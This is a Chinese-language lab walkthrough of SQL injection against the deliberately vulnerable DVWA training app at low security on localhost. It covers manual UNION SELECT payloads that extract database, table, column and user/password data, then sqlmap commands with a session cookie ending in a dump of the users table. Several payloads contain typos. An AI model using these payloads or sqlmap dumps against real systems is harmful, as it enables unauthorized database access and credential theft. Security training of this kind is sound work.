dvwa sql (low) 注入
一. 手工注入
- 输入1 提交
-
输入1‘ 提交
-
输入 1 and 1=1提交
4.输入 1 and 1=2提交
由上可以看出是存在注入点的
sql查询语句: select First name 的列名 and surname 的列名 from 表名 where id的列名 =’w我们输入的id‘ -
输入1’ union select 1, databse()#
6.输入 1’ union select1,table_name from information_schema.tables where table_name=‘dvwa’#
7.输入 1‘ union select1, column_name from information_schema.columns where table_name=‘users’#
8.输入1’ union select1,concat(user,password) from user#
二.利用sqlmap注入
1.找注入点 先输入1,返回正常
再输入1’ 报错,返回
可以判断除sql注入漏洞,使用sqlmap进行注入攻击
2. 在命令行中输入python sqlmap.py -u “localhost:82/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit”
3.sqlmap got a 302 redirect to ‘http://localhost:82/DVWA-master/login.php’. Do you want to follow? [Y/n]
回答Y
4.python sqlmap.py -u “localhost:82/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie “F12→→Console→→document.cookie得到当前页面cookie”
cookie为"security=low; PHPSESSID=971ue9m81hgo1d54e43t4umpj3"
5.python sqlmap.py -u “~~~” --cookie
–dbs 参数可以得到所有数据库
#available databases [6]:
[] dvwa
[] information_schema
[] mysql
[] performance_schema
[] phpmyadmin
[] test
6.python sqlmap.py -u “~~~” --cookie --current-db
可以得到当前使用的数据库
#current database:‘dvwa’
7.python sqlmap.py -u --cookie --table-D
得到dvwa数据库下的表
8.–columns-T" " -D" "
可以得到dvwa数据库下面的表users下面的columns
9.–dump -C" " -T " "-D " "
可以得到dvwa 数据库 下面的表users 下面的columns的具体值